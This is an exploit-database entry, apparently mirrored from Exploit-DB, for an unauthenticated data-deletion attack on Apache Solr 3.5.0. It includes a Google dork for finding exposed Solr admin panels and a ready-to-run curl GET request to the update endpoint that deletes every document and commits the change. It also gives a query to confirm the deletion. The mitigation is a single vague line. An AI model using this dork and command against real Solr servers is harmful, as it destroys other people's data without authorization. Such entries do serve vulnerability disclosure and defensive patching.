header-logo
Suggest Exploit
vendor:
Solr
by:
N37 [Myanmar]
7,5
CVSS
HIGH
Data Deletion
20
CWE
Product Name: Solr
Affected Version From: 3.5.0
Affected Version To: 3.5.0
Patch Exists: N/A
Related CWE: N/A
CPE: lucene:solr
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Fedora 23
2016

All Solr Data Can Be Delete

Solr is an open source enterprise search platform built on Apache Lucene. It can be used for natural language processing, data research, data mining, and some mobile backends on virtual private servers. An attacker can delete all data in Solr by using a GET request with a delete query and a commit parameter set to true. This can be tested by sending a GET request to the server with the URL http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on and then sending a GET request with the URL http://server:8080/solr/lambeth_locations/update?stream.body=<delete><query>*:*<%2Fquery><%2Fdelete>&commit=true. After this, the first query can be used to verify that all data has been deleted.

Mitigation:

Ensure that all Solr instances are properly secured and that only authorized users have access to the data.
Source

Exploit-DB raw data:

# Exploit Title: All Solr Data Can Be Delete
# Google Dork: intext:[Schema] [Config] [Analysis] [Schema Browser]
[Statistics] [Info] [Distribution] [Ping] [Logging]
# Date: 5/2/2016
# Exploit Author: N37 [Myanmar]
# Vendor Homepage: http://lucene.apache.org/solr/
# Software Link:  https://archive.apache.org/dist/lucene/solr/3.5.0/
# Version: 3.5.0
# Tested on: fedora 23


Solr is  open source enterprise search platform built on Apache Lucene.

It can be delete all data in solr. solr are use nlp, money of data research, data mining,  some of mobile backend on vps .


POC or Eg.

This Query is shwo all data in solr :
http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on

You can delete all data with curl in terminal :
curl -X GET "server:8080/solr/lambeth_locations/update?stream.body=<delete><query>*:*<%2Fquery><%2Fdelete>&commit=true"

now you can check with first query in browser. All data are deleted.


Regards,
N37 [Myanmar]

Navigation

Suggest Exploit

Services By CQR